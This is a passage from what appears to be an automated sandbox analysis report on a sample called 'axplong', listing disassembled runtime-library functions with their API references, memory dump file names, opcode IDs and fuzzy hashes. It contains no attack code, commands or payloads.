                                                                                                                                                                                                                                                    • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 006A334C
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 78362717-0
                                                                                                                                                                                                                                                    • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                                                                                                                                                                    • Instruction ID: 30c44823e5fa8cc12bf7c129207b5f38688744815b6e563b11bb876d6ee14dee
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23012B32604520A7CF12BE648851AEF779FAF56350F00001AFC129B341CD31EE019BE0
                                                                                                                                                                                                                                                    Function 00699440 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00699449
                                                                                                                                                                                                                                                      • Part of subcall function 0068F3FB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 006953B6
                                                                                                                                                                                                                                                    • Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 0069946D
                                                                                                                                                                                                                                                    • Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00699480
                                                                                                                                                                                                                                                    • Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00699489
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 218105897-0
                                                                                                                                                                                                                                                    • Opcode ID: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                                                                                                                                                    • Instruction ID: 6d9b51965faf4007e0b21296f176cf22d0030b9b55a8243f87c1042172f36d61
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DFF0A771200A204EEEA1BB6C8411F6A23DF9F45B11F00C41DE49BD7A42CA24EC438B95
                                                                                                                                                                                                                                                    Function 00687040 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 236COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __Mtx_init_in_situ.LIBCPMT ref: 0068726C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Mtx_init_in_situ
                                                                                                                                                                                                                                                    • String ID: @.g$`zh
                                                                                                                                                                                                                                                    • API String ID: 3366076730-1055780419
                                                                                                                                                                                                                                                    • Opcode ID: 3dd6a4be338f6fc3031f1224a7afb30a905b2697585c6bd158d263c56b417d44
                                                                                                                                                                                                                                                    • Instruction ID: 6511f35fe007b915fd380a36bb10556e1cf770ac07419a62ac0f07569e2d6c2d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3dd6a4be338f6fc3031f1224a7afb30a905b2697585c6bd158d263c56b417d44
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3AA138B0A016198FDB21DFA8C88479EBBF2FF49710F188259E859AB351E775DD01CB90
                                                                                                                                                                                                                                                    Function 00687870 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00687968
                                                                                                                                                                                                                                                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00687971
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
